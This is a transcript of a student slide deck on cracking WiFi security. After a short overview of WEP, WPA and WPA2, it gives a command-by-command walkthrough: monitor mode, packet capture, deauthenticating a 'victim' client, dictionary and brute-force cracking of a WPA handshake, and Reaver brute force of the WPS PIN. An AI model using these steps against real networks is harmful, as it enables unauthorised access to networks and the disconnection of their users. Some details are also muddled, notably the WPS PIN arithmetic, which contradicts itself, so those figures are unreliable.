exploiting wifi security
DESCRIPTION
this slide is regarding wifi Security exploitationTRANSCRIPT
![Page 1: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/1.jpg)
WPA EXPLOITATION IN THE WORLD OF WIRELESS NETWORK
By Hariraj Rathod8th sem
Department of Electronics and Communication
![Page 2: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/2.jpg)
WIFI – WIRELESS FIDELITY
Wi-Fi, is a popular technology that allows an electronic device to exchange data or connect to the internet wirelessly using radio waves.
Wireless access allows users to connect to the internet from any location within range of a wireless access point.
![Page 3: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/3.jpg)
SOME BASIC TERMS
MAC address or physical address is a unique identifier assigned to network interfaces for communications
Access point >> Wireless router
SSID (service set identifier) >> Network Name
BSSID (basic service set identification ) >> MAC address of the access point
![Page 4: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/4.jpg)
BASIC WORKING
When a user uses wireless internet they generate what are called data “packets”.
Packets are transmitted between the wireless card and the wireless access point via radio waves whenever the computer is connected with the access point.
![Page 5: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/5.jpg)
BASIC WORKING CONTD.
Depending on how long the computer is connected, it can generate a certain number of packets per day.
The more users that are connected to one access point, the more packets are generated.
![Page 6: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/6.jpg)
WIRELESS USES RADIO FREQUENCY
2.4 Ghz wifi spectrum
![Page 7: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/7.jpg)
WIRELESS ENCRYPTION
The main source of vulnerability associated with wireless networks are the methods of encryption. Different type of wireless encryption are as follows:
WEP WPA WPA2
![Page 8: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/8.jpg)
WEP
Stands for Wired Equivalent Privacy.
WEP is recognizable by the key of 10 or 26 hexadecimal digits.
WEP protocol was not developed by researchers or experts in security and cryptography.
Initial bytes of the key stream depended on just a few bits of the encryption key.
![Page 9: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/9.jpg)
WEP CONTINUED
WEP Encryption Process
ICV:-32 bit integrity check value (ICV)IV:- Initialization Vector
![Page 10: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/10.jpg)
WEP CONTINUED
WEP Decryption Process
With multiple wireless clients sending a large amount of data, an attacker can remotely capture large amounts of WEP ciphertext and use cryptanalysis methods to determine the WEP key.
![Page 11: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/11.jpg)
WPA OR WPA2 Stands for Wi-Fi Protected Access
Created to provide stronger security
Still able to be cracked if a short password is used.
If a long passphrase or password is used, these protocol are virtually not crackable.
WPA-PSK and TKIP(Temporal Key Integrity Protocol ) or AES(Advance Encryption Standard) use a Pre-Shared Key (PSK) that is more than 7 and less than 64 characters in length.
WPS (WiFi protected Feature) simple plug and play feature.
![Page 12: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/12.jpg)
USING BACKTRACK >>
Some Basic Backtrack Terms >>Wlan1 – wireless interfaceMon0 – monitor modeHandshake –
refers to the negotiation process between the computer and a WiFi server using WPA encryption.
Needed to crack WPA/WPA2.Dictionary - consisting the list of common
passwords. .cap file – used to store packets.
![Page 13: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/13.jpg)
MONITOR MODE
Monitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received from the wireless network.
Monitor mode allows packets to be captured without having to associate with an access point first.
![Page 14: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/14.jpg)
TOOLS USED
Airmon-ng >> Placing different cards in monitor mode
Airodump-ng (Packet sniffer ) >> Tool used to listen to wireless routers in the area.
Aireplay-ng ( Packet injector ) >> Aireplay-ng is used to inject frames. The primary function is to generate traffic for the later
use in aircrack-ng for cracking the WEP and WPA-PSK keys.
Aircrack-ng >> Cracks WEP and WPA (Dictionary attack) keys.
![Page 15: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/15.jpg)
TOOLS USED….CONTINUED Word Field (Brute Force)
Reaver Tool. (Brute Force)
![Page 16: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/16.jpg)
AIRCRACK-NG Selecting the Interface to put it in monitor
mode. Command used airmon-ng start wlan1
![Page 17: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/17.jpg)
AIRCRACK-NG CONTINUED
Start Capturing Packets. Airodump-ng mon0
Airodump-ng mon0 –channel 1 –bssid “mac id” –w reddot
![Page 18: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/18.jpg)
AIRCRACK-NG CONTINUED
Deauthenticate the device connected to access point and force them to re exchange WPA key.
Aireplay-ng -o 4 -a F4:EC:38:BA:6C:44 –c 90:4C:E5:B2:6F:D8 mon0 where "-0 4" tells aireplay to inject deauthentication packets (4 of them), "-a" is the wireless access point MAC address and "-c" is the client (victim) MAC address.
![Page 19: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/19.jpg)
AIRCRACK-NG CONTINUED
Authentication process in WPA
![Page 20: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/20.jpg)
AIRCRACK-NG CONTINUED
4-way handshake os captured.
![Page 21: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/21.jpg)
AIRCRACK-NG CONTINUED
Cracking the WPA key using aircrack-ng, dictionary file and 4-way handshake captured file redot.cap aircrack-ng -w /home/pranav/download/password.lst–b F4:EC:38:BA:6C:44 /home/pranav/reddot-01.cap where "-w" specifies the dictionary file to use.
![Page 22: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/22.jpg)
JOHN THE RIPPER
Faster then the previously used tool. /pentest/password/john-1.7.6.jumbo12/run/
john -stdout -incremantal all aircrack-ng –b 00:17:9A:82:44:1B -w -/home/pranav/test-01.cap
![Page 23: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/23.jpg)
WORD FIELD
Word Field is a brute force attack. Command line used wordfield [OPTION...]
MINLENGTH [MAXLENGTH] Wordfield -a -n 8 8" will output all possible
alphanumeric strings which are 8 characters long.
wordfield -a -n 8 8 | aircrack-ng –b 00:17:9A:82:44:1B -w - /home/pranav/Wifire-02.cap
This attack is really effective on weak keys.
![Page 24: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/24.jpg)
WORD FIELD CONTINUED
The below took 22 hrs 7 minutes and 35 seconds
![Page 25: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/25.jpg)
DICTIONARY AND BRUTE FORCE LIMITATIONS
Passphrase cant be necessarily be found in Dictionary list hence it has its limitations.
Brute force technics require lot of fast hardware computational power.
Source: http://lastbit.com/pswcalc.asp
![Page 26: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/26.jpg)
REAVER TOOL.
Reaver is fantastic tool to crack WPS pin written by Craig Heffner.
This tool exploits the wps 8 digit pin. 1 bit is a checksum bit. 7 unknown numbers, meaning there are a
possible 10^7 (10,000,000) combinations which will take approximately 116 days to break at 1 attempt every second.
![Page 27: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/27.jpg)
REAVER TOOL CONTINUED
WPS pin 65020920
![Page 28: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/28.jpg)
REAVER TOOL CONTINUED
Finding WPS victim wash –I mon0
![Page 29: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/29.jpg)
REAVER TOOL CONTINUEDCRACKING TECHNIQUE
WPS pin 6502-0920 10^4 (10,000) combinations. But since 1st bit is checksum bit hence the
combinations reduce to 10^3(1000) This reduces the time required to break the
PIN to just over 3 hours - Again, assuming that 1 attempt is made every second.
![Page 30: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/30.jpg)
REAVER TOOL CONTINUED
reaver -i mon0 –b F4:EC:38:BA:6C:44
![Page 31: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/31.jpg)
REAVER TOOL CONTINUED
![Page 32: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/32.jpg)
BESECURED
![Page 33: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/33.jpg)
REFERENCES Wi-Fi security – WEP, WPA and WPA2 Guillaume
Lehembre http://en.wikipedia.org/wiki/Wi-
Fi_Protected_Access#WPS_PIN_recovery https://sites.google.com/site/clickdeathsquad/
Home/cds-wpacrack http://samiux.blogspot.in/2010/04/howto-
crackwpawpa2-psk-with-john.html http://www.zer0trusion.com/2011/09/
crackingwpa-without-dictionary.html Tactical Network Solutions WiFi Security Megaprimer by Vivek
Ramchandran
![Page 34: Exploiting WiFi Security](https://reader036.vdocuments.us/reader036/viewer/2022062300/5562c06dd8b42a09618b5001/html5/thumbnails/34.jpg)
THANKS : )